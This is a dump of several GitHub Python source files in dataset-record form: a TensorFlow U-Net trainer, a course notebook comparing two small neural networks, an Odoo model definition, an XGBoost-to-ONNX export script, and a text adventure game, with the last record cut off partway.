img_conv\n\n\t\t\tself.unPooling.append(X)\n\n\t\t\t#---------maxpool--------\n\n\t\t\timg_pool = self.max_pooling(img_conv)\n\n\t\t\tX = img_pool\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\t\t#third convolution 24*24*64 -->12*12*128 \n\n\t\twith tf.name_scope('third_convolution'):\n\n\t\t\t#---------conv1----------\n\n\t\t\tw_conv = self.weight_variable([3,3,64,128])\n\t\t\tb_conv = self.bias_variable([128])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t# ---------conv2-----------\n\t\t\tw_conv = self.weight_variable([3,3,128,128])\n\t\t\tb_conv = self.bias_variable([128])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\tself.unPooling.append(X)\n\n\t\t\t#---------maxpool--------\n\n\t\t\timg_pool = self.max_pooling(img_conv)\n\n\t\t\tX = img_pool\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\n\t\t#bottom convolution 12*12*128 --->24*24*128\n\n\t\t\n\t\twith tf.name_scope('bottom_convolution'):\n\n\t\t\t#---------conv1----------\n\n\t\t\tw_conv = self.weight_variable([3,3,128,256])\n\t\t\tb_conv = self.bias_variable([256])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t# ---------conv2-----------\n\t\t\tw_conv = self.weight_variable([3,3,256,256])\n\t\t\tb_conv = self.bias_variable([256])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t#---------usample--------\n\t\t\tw_conv = self.weight_variable([2,2,128,256])\n\t\t\tb_conv = self.bias_variable([128])\n\n\n\t\t\timg_deconv = tf.nn.relu(self.deconv(img_conv,w_conv,[batch_size,24,24,128])+b_conv)\n\t\t\tX = img_deconv\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\n\t\twith tf.name_scope('first_deconvolution'):\n\n\t\t\ttempMatrix = self.unPooling[2]\n\n\t\t\t#transfer the matrix\n\n\t\t\tif mode == 1:\n\n\t\t\t\tw_conv = self.weight_variable_alter([24*24*128,1])\n\t\t\t\tb_conv = self.bias_variable([24*24*128])\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,24*24*128])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\n\t\t\t\tw_conv = self.weight_variable_alter([24*24*128,1])\n\t\t\t\tb_conv = self.bias_variable([24*24*128])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,24,24,128])\n\n\n\t\t\tX = self.merge_img(tempMatrix,X)\n\n\t\t\t#first deconvolution\n\t\t\t\n\t\t\tw_conv = self.weight_variable([3,3,256,128])\n\t\t\tb_conv = self.bias_variable([128])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([3,3,128,128])\n\t\t\tb_conv = self.bias_variable([128])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([2,2,64,128])\n\t\t\tb_conv = self.bias_variable([64])\n\n\n\t\t\timg_deconv = tf.nn.relu(self.deconv(img_deconv,w_conv,[batch_size,48,48,64])+b_conv)\n\n\n\t\t\tX = img_deconv\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\n\t\twith tf.name_scope('second_deconvolution'):\n\n\t\t\ttempMatrix = self.unPooling[1]\n\n\t\t\t#transfer the matrix\n\n\t\t\tif mode == 1:\n\n\t\t\t\tw_conv = self.weight_variable_alter([48*48*64,1])\n\t\t\t\tb_conv = self.bias_variable([48*48*64])\n\t\t\t\t\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,48*48*64])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\t\n\t\t\t\tw_conv = self.weight_variable_alter([48*48*64,1])\n\t\t\t\tb_conv = self.bias_variable([48*48*64])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,48,48,64])\n\n\n\t\t\tX = self.merge_img(tempMatrix,X)\n\n\t\t\t# second deconvolution\n\n\t\t\tw_conv = self.weight_variable([3,3,128,64])\n\t\t\tb_conv = self.bias_variable([64])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([3,3,64,64])\n\t\t\tb_conv = self.bias_variable([64])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([2,2,32,64])\n\t\t\tb_conv = self.bias_variable([32])\n\n\n\t\t\timg_deconv = tf.nn.relu(self.deconv(img_deconv,w_conv,[batch_size,96,96,32])+b_conv)\n\n\n\t\t\tX = img_deconv\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\n\t\twith tf.name_scope('final_layer'):\n\n\t\t\ttempMatrix = self.unPooling[0]\n\n\t\t\t#transfer the matrix\n\n\t\t\tif mode == 1:\n\n\t\t\t\tw_conv = self.weight_variable_alter([96*96*32,1])\n\t\t\t\tb_conv = self.bias_variable([96*96*32])\n\n\t\t\t\t\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,96*96*32])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\tw_conv = self.weight_variable_alter([96*96*32,1])\n\t\t\t\tb_conv = self.bias_variable([96*96*32])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,96,96,32])\n\n\n\t\t\tX = self.merge_img(tempMatrix,X)\n\n\t\t\t#final layer\n\n\t\t\tw_conv = self.weight_variable([3,3,64,32])\n\t\t\tb_conv = self.bias_variable([32])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([3,3,32,32])\n\t\t\tb_conv = self.bias_variable([32])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([1,1,32,2])\n\t\t\tb_conv = self.bias_variable([2])\n\n\t\t\timg_deconv = tf.nn.conv2d(input = X,filter = w_conv,strides = [1,1,1,1],padding = 'VALID')\n\n\t\t\tself.prediction = tf.nn.bias_add(img_deconv,b_conv)\n\n\n\t\t#softmax loss\n\n\t\twith tf.name_scope('softmax'):\n\n\t\t\tself.loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = self.input_label,logits = self.prediction, name = 'loss')\n\n\t\t\tself.loss_mean = tf.reduce_mean(self.loss)\n\n\t\t\ttf.add_to_collection(name = 'loss',value=self.loss_mean)\n\n\t\t\tself.loss_all = tf.add_n(inputs = tf.get_collection(key= 'loss'))\n\n\n\n\t\twith tf.name_scope('accurancy'):\n\n\t\t\tself.correct_prediction = tf.equal(tf.argmax(input=self.prediction, axis=3, output_type=tf.int32), self.input_label)\n\n\t\t\tself.correct_prediction = tf.cast(self.correct_prediction,tf.float32)\n\n\t\t\tself.accurancy = tf.reduce_mean(self.correct_prediction)\n\n\t\twith tf.name_scope('gradient_descent'):\n\n\t\t\tself.train_step = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(self.loss_all)\n\n\n\n\tdef train(self,batch_size,path):\n\n\t\tckpt_path = path+\"/ckpt-unet/model.ckpt\"\n\t\t\n\t\ttf.summary.scalar(\"loss\", self.loss_mean)\n\t\t\n\t\ttf.summary.scalar('accuracy', self.accurancy)\n\t\t\n\t\tmerged_summary = tf.summary.merge_all()\n\n\n\t\tmodel_dir = path+\"/data/model\"\n\n\t\ttb_dir = path+\"/data/logs\"\n\n\t\tall_parameters_saver = tf.train.Saver()\n\n\n\t\twith tf.Session() as sess:\n\n\t\t\timage,label = readData_single(path)\n\n\t\t\timage_batch,label_batch = tf.train.shuffle_batch([image,label],batch_size = batch_size,num_threads = 4,capacity = 1012,min_after_dequeue = 1000)\n\n\t\t\tlabel_batch = tf.reshape(label_batch, [batch_size, 96, 96])\n\n\t\t\tsess.run(tf.global_variables_initializer())\n\t\t\t\n\t\t\tsess.run(tf.local_variables_initializer())\n\n\t\t\tsummary_writer = tf.summary.FileWriter(tb_dir, sess.graph)\n\t\t\t\n\t\t\ttf.summary.FileWriter(model_dir, sess.graph)\n\t\t\t\n\t\t\tcoord = tf.train.Coordinator()\n\t\t\t\n\t\t\tthreads = tf.train.start_queue_runners(coord = coord)\n\n\t\t\ttry:\n\n\t\t\t\tepoch = 1\n\n\t\t\t\twhile not coord.should_stop():\n\n\n\t\t\t\t\texample,label = sess.run([image_batch,label_batch])\n\n\n\t\t\t\t\tlo,acc,summary = sess.run([self.loss_mean,self.accurancy,merged_summary],feed_dict = {\n\t\t\t\t\t\t\tself.input_image:example,self.input_label:label,self.keep_prob:1.0,self.lamb:0.004\n\t\t\t\t\t\t})\n\n\t\t\t\t\tsummary_writer.add_summary(summary, epoch)\n\n\t\t\t\t\tsess.run([self.train_step],feed_dict={\n\t\t\t\t\t\t\tself.input_image: example, self.input_label: label, self.keep_prob: 0.6,\n\t\t\t\t\t\t\tself.lamb: 0.004\n\t\t\t\t\t\t})\n\n\t\t\t\t\tepoch+=1\n\n\n\t\t\t\t\tif epoch%10 == 0:\n\t\t\t\t\t\twriteInfo(str(epoch)+\" \"+str(lo)+\" \"+str(acc))\n\t\t\t\t\t\tprint('num %d, loss: %.6f and accuracy: %.6f' % (epoch, lo, acc))\n\n\t\t\t\t\tif epoch% 300 == 0:\n\t\t\t\t\t\tall_parameters_saver.save(sess = sess,save_path = ckpt_path)\n\n\n\t\t\texcept tf.errors.OutOfRangeError:\n\t\t\t\tprint('Done training -- epoch limit reached')\t\n\n\n\t\t\tfinally:\n\t\t\t\tall_parameters_saver.save(sess = sess,save_path = ckpt_path)\n\t\t\t\tcoord.request_stop()\n\n\t\t\tcoord.join(threads)\n\n\t\t\tprint(\"done training\")\n\n\n\n\tdef estimate(self,batch_size,path):\n\t\timgPath = path+\"/J17522.jpg\"\n\n\t\timg = cv2.imdecode(np.fromfile(imgPath,dtype=np.uint8),-1)\n\t\timg = cv2.resize(src = img,dsize=(96,96))\n\t\timg = compressImg(img)\n\t\t\n\t\tnewImg = []\n\t\ti=0\n\t\twhile i!=batch_size:\n\t\t\tnewImg.append(img)\n\t\t\ti+=1\n\t\tdata = newImg\n\t\tdata = np.reshape(a=data, newshape=(batch_size,96,96,1))\n\n\t\tckpt_path = path+\"/ckpt-unet/model.ckpt\"\n\n\t\tall_parameters_saver = tf.train.Saver()\n\t\twith tf.Session() as sess: \n\t\t\tsess.run(tf.global_variables_initializer())\n\t\t\tsess.run(tf.local_variables_initializer())\n\t\t\tall_parameters_saver.restore(sess=sess, save_path=ckpt_path)\n\t\t\tpredict_image = sess.run(\n\t\t\t\t\t\t\ttf.argmax(input=self.prediction, axis=3), \n\t\t\t\t\t\t\tfeed_dict={\n\t\t\t\t\t\t\t\tself.input_image: data,\n\t\t\t\t\t\t\t\tself.keep_prob: 1.0, self.lamb: 0.004\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t)\n\t\t\t\n\t\t\tpredict_image = predict_image[0]\n\t\t\t\n\t\t\tpredict_image = binaryToImg(predict_image)\n\t\t\tpredict_image = Ige.fromarray(predict_image,'RGB')\n\t\t\tpredict_image.save('predict_image.jpg')\n\t\t\tpredict_image.show() \n\t\t\t\n\t\t\t\n\t\tprint('Done prediction')\n\n\n\ndef main():\n\tbasePath = \"/root\"\n\tunet = Unet()\n\tunet.setup_network(64,1)\n\tunet.train(64,basePath)\n\t#unet.estimate(64,basePath)\n\nmain()\n","repo_name":"MarshallDu0204/oracle-bone-script","sub_path":"U-net-alter.py","file_name":"U-net-alter.py","file_ext":"py","file_size_in_byte":13715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25620408923","text":"\n# coding: utf-8\n\n# # ** CPSC 8810 Deep Learning - HW1-1 **\n# ---\n# \n# ## Introduction\n# \n# The main objective of this assignments:\n# * Train 2 distinct DNN models with same amount of parameters until convergence\n# * Compare the training process of two different models\n# * Visualize ground truth and predictions from models\n# \n# In this assignment, two neural networks with same number of parameters but different number of layers are trained to simulate two separate functions. To ensure reproducible results, random seed is fixed for this assignment. The output results of both model are then compared at the final cell of this notebook to determine the effect of number of layers or number of activation functions used.\n\n# In[193]:\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.decomposition import PCA\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\ntf.__version__\n\n\n# ### Set the seed to obtain reproducible results\n\n# In[194]:\n\n\ntf.set_random_seed(1)\nnp.random.seed(1)\n\n\n# ## Data preparation and visualization\n# \n# In the first assignment, two distinct functions are used to compare two models with different number of layers but same number of parameters.\n# ### Function 1 \n# *f(x) = Sin(5πx)/(5πx)* \n# ### Function 2\n# *f(x) = Sigmoid(Sin(5πx))*\n# \n\n# In[195]:\n\n\nX = np.arange(0.0001,1,0.0001)\nX_train = X.reshape(-1,1).astype(np.float32)\nY1 = np.sin(5*np.pi*X)/(5*np.pi*X)\nY1_train = Y1.reshape(-1,1).astype(np.float32)\nY2 = np.sign(np.sin(5*np.pi*X))\nY2_train = Y2.reshape(-1,1).astype(np.float32)\nfig,axs = plt.subplots(1,2)\nfig.suptitle('Functions')\nfig.set_figwidth(15)\naxs[0].plot(X,Y1)\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\naxs[0].set_title('f(x) = Sin(5πx)/(5πx)')\naxs[1].plot(X,Y2)\naxs[1].set_xlabel('x')\naxs[1].set_ylabel('f(x)')\naxs[1].set_title('f(x) = Sigmoid(Sin(5πx))');\n\n\n# ## Placeholder for Input and Output\n\n# In[210]:\n\n\ntf.reset_default_graph()\ninput_x = tf.placeholder(tf.float32,shape=[None,1])\noutput_y = tf.placeholder(tf.float32,shape=[None,1])\n\n\n# ## 1 - 1st Model\n\n# ### 1.1 Network Architecture\n\n# In[211]:\n\n\n# Model 1 neural network layers\nm1_h1 = tf.layers.dense(inputs=input_x, units=5, activation=tf.nn.relu, name='model1_h1') # hidden layer\nm1_h2 = tf.layers.dense(inputs=m1_h1, units=10, activation=tf.nn.relu, name='model1_h2') # hidden layer\nm1_h3 = tf.layers.dense(inputs=m1_h2, units=15, activation=tf.nn.relu, name='model1_h3') # hidden layer\nm1_h4 = tf.layers.dense(inputs=m1_h3, units=10, activation=tf.nn.relu, name='model1_h4') # hidden layer\nm1_h5 = tf.layers.dense(inputs=m1_h4, units=5, activation=tf.nn.relu, name='model1_h5') # hidden layer\nm1_output = tf.layers.dense(inputs=m1_h4, units=1, name='model1_output') # output layer\n\n\n# ### 1.2 Parameters Count\n\n# In[212]:\n\n\ntotal_parameters = 0\nfor variable in tf.trainable_variables():\n if(variable.name.find(\"model1\")>=0):\n print(variable)\n shape = variable.get_shape()\n variable_parameters = 1\n for dim in shape:\n variable_parameters *= dim.value\n print(\"parameter num:\",variable_parameters)\n total_parameters += variable_parameters\nprint(\"Total Parameter: \",total_parameters)\n\n\n# ### 1.3 Loss function and Optimizer Initialization\n\n# In[213]:\n\n\nm1_loss = tf.losses.mean_squared_error(output_y, m1_output) # compute cost\nm1_optimizer = tf.train.AdamOptimizer(learning_rate=0.0001)\nm1_train_op = m1_optimizer.minimize(m1_loss)\n\n\n# ### 1.4 Training model on Function 1\n\n# In[214]:\n\n\nsess = tf.Session() \nsess.run(tf.global_variables_initializer()) # initialize var in graph\nEPOCH = 10000\n\nm1_loss_list1 = []\nfor i in range(EPOCH):\n # train and net output\n _, l, pred = sess.run([m1_train_op, m1_loss, m1_output], feed_dict={input_x: X_train, output_y: Y1_train})\n m1_loss_list1.append(l)\n if i%2000 == 0:\n print(\"Epoch: \",i,\"Loss: \",l)\nm1_pred1 = pred\n\n\n# ### 1.5 Training model on Function 2\n\n# In[215]:\n\n\nsess = tf.Session() \nsess.run(tf.global_variables_initializer()) # initialize var in graph\nEPOCH = 10000\nm1_loss_list2 = []\nfor i in range(EPOCH):\n # train and net output\n _, l, pred = sess.run([m1_train_op, m1_loss, m1_output], feed_dict={input_x: X_train, output_y: Y2_train})\n m1_loss_list2.append(l)\n if i%2000 == 0:\n print(\"Epoch: \",i,\"Loss: \",l)\nm1_pred2 = pred\n\n\n# ### 1.6 Result Visualization\n\n# In[216]:\n\n\n# Function 1\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m1_pred1,X,Y1)\nfig.suptitle('Function 1')\naxs[0].legend(('Model 1','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\nepoch_list = np.arange(EPOCH)\naxs[1].plot(epoch_list,m1_loss_list1)\naxs[1].set_ylim([0,0.02])\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\nplt.pause(0.1)\n\n# Function 2\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m1_pred2,X,Y2)\nfig.suptitle('Function 2')\naxs[0].legend(('Model 1','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\naxs[1].plot(epoch_list,m1_loss_list2)\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\n\n# ---\n# ## 2 - 2nd Model\n\n# ### 2.1 Network Architecture\n\n# In[217]:\n\n\ntf.reset_default_graph()\ninput_x = tf.placeholder(tf.float32,shape=[None,1])\noutput_y = tf.placeholder(tf.float32,shape=[None,1])\n# Model 2 neural network layers\nm2_h1 = tf.layers.dense(inputs=input_x, units=6, activation=tf.nn.relu, name='model2_h1') # hidden layer\nm2_h2 = tf.layers.dense(inputs=m2_h1, units=18, activation=tf.nn.relu, name='model2_h2') # hidden layer\nm2_h3 = tf.layers.dense(inputs=m2_h2, units=16, activation=tf.nn.relu, name='model2_h4') # hidden layer\nm2_output = tf.layers.dense(inputs=m2_h3, units=1, name='model2_output') # output layer\n\n\n# ### 2.2 Parameters Count\n\n# In[218]:\n\n\ntotal_parameters = 0\nfor variable in tf.trainable_variables():\n if(variable.name.find(\"model2\")>=0):\n print(variable)\n shape = variable.get_shape()\n variable_parameters = 1\n for dim in shape:\n variable_parameters *= dim.value\n print(\"parameter num:\",variable_parameters)\n total_parameters += variable_parameters\nprint(\"Total Parameter: \",total_parameters)\n\n\n# ### 2.3 Loss Function and Optimizer Initialization\n\n# In[219]:\n\n\nm2_loss = tf.losses.mean_squared_error(output_y, m2_output) # compute cost\nm2_optimizer = tf.train.AdamOptimizer(learning_rate=0.0001)\nm2_train_op = m2_optimizer.minimize(m2_loss)\n\n\n# ### 2.4 Training Model on Function 1\n\n# In[220]:\n\n\nsess = tf.Session() \nsess.run(tf.global_variables_initializer()) # initialize var in graph\nEPOCH = 10000\nm2_loss_list1 = []\nfor i in range(EPOCH):\n # train and net output\n _, l, pred = sess.run([m2_train_op, m2_loss, m2_output], feed_dict={input_x: X_train, output_y: Y1_train})\n m2_loss_list1.append(l)\n if i%2000 == 0:\n print(\"Epoch: \",i,\"Loss: \",l)\nm2_pred1 = pred\n\n\n# ### 2.5 Training Model on Function 2\n\n# In[221]:\n\n\nsess = tf.Session() \nsess.run(tf.global_variables_initializer()) # initialize var in graph\nEPOCH = 10000\nm2_loss_list2 = []\nfor i in range(EPOCH):\n # train and net output\n _, l, pred = sess.run([m2_train_op, m2_loss, m2_output], feed_dict={input_x: X_train, output_y: Y2_train})\n m2_loss_list2.append(l)\n if i%2000 == 0:\n print(\"Epoch: \",i,\"Loss: \",l)\nm2_pred2 = pred\n\n\n# ### 2.6 Result Visualization\n\n# In[222]:\n\n\n# Function 1\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m2_pred1,X,Y1)\nfig.suptitle('Function 1')\naxs[0].legend(('Model 2','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\nepoch_list = np.arange(EPOCH)\naxs[1].plot(epoch_list,m2_loss_list1)\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\nplt.pause(0.1)\n\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m2_pred2,X,Y2)\nfig.suptitle('Function 2')\naxs[0].legend(('Model 2','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\naxs[1].plot(epoch_list,m2_loss_list2)\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\n\n# ## Final Result Comparison\n\n# In[223]:\n\n\n# Function 1\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m1_pred1,X,m2_pred1,X,Y1)\nfig.suptitle('Function 1')\naxs[0].legend(('Model 1','Model 2','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\nepoch_list = np.arange(EPOCH)\naxs[1].plot(epoch_list,m1_loss_list1,epoch_list,m2_loss_list1)\naxs[1].legend(('Model 1','Model 2'))\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\nplt.pause(0.1)\n\n# Function 2\nfig,axs = plt.subplots(1,2)\nfig.set_figwidth(15)\naxs[0].plot(X,m1_pred2,X,m2_pred2,X,Y2)\nfig.suptitle('Function 2')\naxs[0].legend(('Model 1','Model 2','Ground Truth'))\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\n\naxs[1].plot(epoch_list,m1_loss_list2,epoch_list,m2_loss_list2)\naxs[1].legend(('Model 1','Model 2'))\naxs[1].set_xlabel('Epoch')\naxs[1].set_ylabel('Loss');\n\n","repo_name":"zftan0709/DL_HW","sub_path":"HW1/CPSC8810_HW1-1 Simulated Function.py","file_name":"CPSC8810_HW1-1 Simulated Function.py","file_ext":"py","file_size_in_byte":8978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74757226119","text":"from odoo import models, fields, api\n\n\nclass ProductionPreparationLineSample(models.Model):\n _name = \"production_preparation_line_sample\"\n _description = '产前准备明细样本'\n _order = 'sequence'\n\n\n group_type = fields.Selection([('1_3pgcxx', '3P过程信息'),\n ('2_swqr', '实物确认'),\n ('3_pxqzb', '培训前准备'),\n ('4_sbpx', '首包培训'),\n ('5_dhkkqzb', '大货开款前准备'),\n ('6_xczk', '现场转款'),\n ], string=\"组别\")\n before_go_online = fields.Selection([('1_four_day', '四天'),\n ('2_three_day', '三天'),\n ('3_two_day', '两天'),\n ('4_punish', '当天'),\n ], string=\"新款上线前\")\n content = fields.Char(string=\"内容\")\n department_ids = fields.Many2many(\"hr.department\", string=\"部门\")\n sequence = fields.Integer(string=\"序号\")","repo_name":"WangNengZhi/odoo_project","sub_path":"custom-addons/fsn_production_preparation/models/production_preparation_line_sample.py","file_name":"production_preparation_line_sample.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"3802443003","text":"import numpy as np\nfrom sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\nimport xgboost as xgb\nimport onnxmltools\nfrom skl2onnx.common.data_types import FloatTensorType\n\nboston = load_boston()\n\nx, y = boston.data, boston.target\nxtrain, xtest, ytrain, ytest=train_test_split(x, y, test_size=0.30, random_state=99)\n\nmodel = xgb.XGBRegressor(objective='reg:squarederror',colsample_bytree = 0.3, learning_rate = 0.1, max_depth = 5,alpha = 10, n_estimators = 10)\nprint(model)\n\nmodel.fit(xtrain, ytrain) \n\ntest_in = np.full((1, 13), 0.2)\nprint(model.predict(test_in))\n\nouttest = model.predict(xtest[0:100])\n\ninitial_types = [('float_input', FloatTensorType([None, xtrain.shape[1]]))]\nonnx_model = onnxmltools.convert_xgboost(model, initial_types=initial_types)\nonnxmltools.utils.save_model(onnx_model, './xgboost_boston.onnx')\n\nnp.savetxt(\"input_xgb.csv\", xtest[0:100], delimiter=\",\")\nnp.savetxt(\"output_xgb.csv\", outtest, delimiter=\",\")\n\n\n","repo_name":"MaB700/onnx_workflow_root","sub_path":"xgboost/xgb.py","file_name":"xgb.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"9934577763","text":"weapon = False\n\ndef strangeCreature():\n actions = [\"fight\",\"flee\"]\n global weapon\n print(\"A strange goul-like creature has appeared. You can either run or fight it. What would you like to do?\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: flee/fight\")\n userInput = input()\n if userInput == \"fight\":\n if weapon:\n print(\"You kill the goul with the knife you found earlier. After moving forward, you find one of the exits. Congats!\")\n else:\n print(\"The goul-like creature has killed you.\")\n quit()\n elif userInput == \"flee\":\n showSkeletons()\n else:\n print(\"Please enter a valid option.\")\n \ndef showSkeletons():\n directions = [\"backward\",\"forward\"]\n global weapon\n print(\"You see a wall of skeletons as you walk into the room. Someone is watching you. Where would you like to go?\")\n userInput = \"\"\n while userInput not in directions:\n print(\"Options: left/backward/forward\")\n userInput = input()\n if userInput == \"left\":\n print(\"You find that this door opens into a wall. You open some of the drywall to discover a knife.\")\n weapon = True\n elif userInput == \"backward\":\n introScene()\n elif userInput == \"forward\":\n strangeCreature()\n else:\n print(\"Please enter a valid option.\")\n \n\ndef hauntedRoom():\n directions = [\"right\",\"left\",\"backward\"]\n print(\"You hear strange voices. You think you have awoken some of the dead. Where would you like to go?\")\n userInput = \"\"\n while userInput not in directions:\n print(\"Options: right/left/backward\")\n userInput = input()\n if userInput == \"right\":\n print(\"Multiple goul-like creatures start emerging as you enter the room. You are killed.\")\n quit()\n elif userInput == \"left\":\n print(\"You made it! You've found an exit.\")\n quit()\n elif userInput == \"backward\":\n introScene()\n else:\n print(\"Please enter a valid option.\")\n\ndef cameraScene():\n directions = [\"forward\",\"backward\"]\n print(\"You see a camera that has been dropped on the ground. Someone has been here recently. Where would you like to go?\")\n userInput = \"\"\n while userInput not in directions:\n print(\"Options: forward/backward\")\n userInput = input()\n if userInput == \"forward\":\n print(\"You made it! You've found an exit.\")\n quit()\n elif userInput == \"backward\":\n showShadowFigure()\n else:\n print(\"Please enter a valid option.\")\n \ndef showShadowFigure():\n directions = [\"right\",\"backward\"]\n print(\"You see a dark shadowy figure appear in the distance. You are creeped out. Where would you like to go?\")\n userInput = \"\"\n while userInput not in directions:\n print(\"Options: right/left/backward\")\n userInput = input()\n if userInput == \"right\":\n cameraScene()\n elif userInput == \"left\":\n print(\"You find that this door opens into a wall.\")\n elif userInput == \"backward\":\n introScene()\n else:\n print(\"Please enter a valid option.\")\n\n\ndef introScene():\n directions = [\"left\",\"right\",\"forward\"]\n print(\"You are at a crossroads, and you can choose to go down any of the four hallways. Where would you like to go?\")\n userInput = \"\"\n while userInput not in directions:\n print(\"Options: left/right/backward/forward\")\n userInput = input()\n if userInput == \"left\":\n showShadowFigure()\n elif userInput == \"right\":\n showSkeletons()\n elif userInput == \"forward\":\n hauntedRoom()\n elif userInput == \"backward\":\n print(\"You find that this door opens into a wall.\")\n else: \n print(\"Please enter a valid option.\")\n\nif __name__ == \"__main__\":\n while True:\n print(\"Welcome to the Adventure Game!\")\n print(\"As an avid traveller, you have decided to visit the Catacombs of Paris.\")\n print(\"However, during your exploration, you find yourself lost.\")\n print(\"You can choose to walk in multiple directions to find a way out.\")\n print(\"Let's start with your name: \")\n name = input()\n print(\"Good luck, \" +name+ \".\")\n introScene()","repo_name":"makeuseofcode/python-adventure-game","sub_path":"AdventureGame.py","file_name":"AdventureGame.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"63"} +{"seq_id":"70465096200","text":"subject_dict = {}\r\n\r\n\"\"\"\r\nthis function parsed the database into a list of dicts\r\ninput: None\r\noutput: the parsed dict\r\n\"\"\"\r\n\r\n\r\ndef parsing():\r\n file_ob = open('DB.txt', 'r')\r\n file_data = file_ob.read()\r\n file_ob.close()\r\n file_data = file_data.split('#')\r\n file_data = file_data[1:]\r\n\r\n for subject in file_data:\r\n subject_list = []\r\n first_star = subject.index('*')\r\n subject_name = subject[:first_star]\r\n subject_name = subject_name.replace('\\n', '')\r\n\r\n questions = subject[first_star+1:]\r\n questions = questions.split('*')\r\n\r\n for question in questions:\r\n question_dict = {}\r\n question_params = question.split('::')\r\n question_dict[\"sub_subject\"] = question_params[0]\r\n question_dict[\"difficulty_level\"] = question_params[1]\r\n question_dict[\"test_or_quiz\"] = question_params[2]\r\n question_dict[\"year\"] = question_params[3]\r\n question_dict[\"semester\"] = question_params[4]\r\n question_dict[\"file_format\"] = question_params[5]\r\n 